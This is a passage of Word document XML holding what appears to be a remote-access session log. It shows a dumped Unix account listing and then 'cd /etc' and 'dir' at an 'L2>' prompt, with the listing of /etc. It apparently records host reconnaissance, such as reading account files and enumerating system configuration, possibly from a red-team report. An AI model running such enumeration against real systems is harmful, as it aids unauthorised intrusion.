        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>colord:*:970:970:colord color management daemon:/nonexistent:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D10B1E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>git_daemon:*:964:964:git daemon:/nonexistent:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A46A3E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>kafka:*:234:234:Apache Kafka user:/nonexistent:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138CBF64" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19972444" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>pgsql:*:70:70:PostgreSQL pseudo-user:/usr/local/pgsql:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5656FC60" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>ta3:*:1003:1003:TA3 User,None,None,None:/home/ta3:/usr/local/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621CC724" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>ta1:*:1004:1004:TA1 User,None,None,None:/home/ta1:/usr/local/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051088DF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin:*:1005:1005:Admin,None,None,None:/home/admin:/usr/local/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665F8FDA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>user:*:1006:1006:User,None,None,None:/home/user:/usr/local/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1E8AEA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>iswitcher:*:1007:1007:Internet Switcher Service,None,None,None:/home/iswitcher:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC4225A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4866AD89" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>L2&gt;cd /etc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261C4E9E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>L2&gt;dir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2700C1D1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw------- root  root    0      .pwd.lock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63182E2A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   ImageMagick</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AFE6C9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   NetworkManager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44358B94" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   UPower</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55388F72" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   X11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E3EAB8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   acpi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B07AAC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    2981   adduser.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645EECA1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    12288  alternatives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A8B5A8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    401    anacrontab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4DA759" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    112    apg.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D19FFD0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   apm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0977996B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   apparmor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4562F4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   apparmor.d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF2169D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   apport</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5A5510" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   apt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7DF9FD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   at-spi2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEC3B13" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r----- root  daemon  144    at.deny</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA30B6A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-x--- root  root    4096   audisp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF9AE3D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-x--- root  root    4096   audit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549E0DA3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   autoconf2.13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7DF7E3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   avahi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519B98DB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    2177   bash.bashrc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5943D7C8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    45     bash_completion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABA05C6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   bash_completion.d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7C48E8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    356    bindresvport.blacklist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5405CD2A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    321    blkid.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9C98D9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] lrwxrwxrwx root  root    15     blkid.tab -&gt; /dev/.blkid.tab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA0BFCE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   bluetooth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EB2F28" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    33     brlapi.key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397CEBF8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    20480  brltty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08756C27" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    22478  brltty.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC2CC97" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   byobu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2F8E15" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   ca-certificates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6A6B36" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    7788   ca-certificates.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9FB735" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   calendar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4435C3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-s--- root  dip     4096   chatscripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCF3495" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    1332   colord.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1421218E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   console-setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56110DDD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   cracklib</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674DC9D9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   cron.d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E457F9F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   cron.daily</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3DBEEB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   cron.hourly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD21423" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   cron.monthly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785B6997" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   cron.weekly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EEAEC1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    722    crontab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B30758" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  lp      4096   cups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2D7DA8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   cupshelpers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3A62D5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   dbus-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEE6631" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   dconf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD30CFE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    2969   debconf.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A61FAC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    11     debian_version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2419FA8E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13ADD0D0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    604    deluser.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E306A05" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   depmod.d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72600CF7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   dhcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DE670C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   dictionaries-common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1424395D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   dnsmasq.d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB95DE1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   doc-base</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E536A4F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   dpkg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61225647" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    3095   drirc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D54CC1D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   emacs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39276B13" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   emacs24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3843792A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    96     environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8C221E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   firefox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0594EB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   fonts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072EC1CF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    678    fstab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CDCBC9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   fstab.d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0FB098" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r----- root  fuse    280    fuse.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF67123" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    2584   gai.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725F3536" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   gconf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49894F3A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   gdb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B15297" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   ghostscript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BA41A0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   gimp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687457A3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   gnome</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5252F11D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   gnome-app-install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F8CAC3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   gnome-system-tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8783E4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] drwxr-xr-x root  root    4096   groff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DB8EA1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] -rw-r--r-- root  root    1030   group</w:t>
      </w:r>
    </w:p>
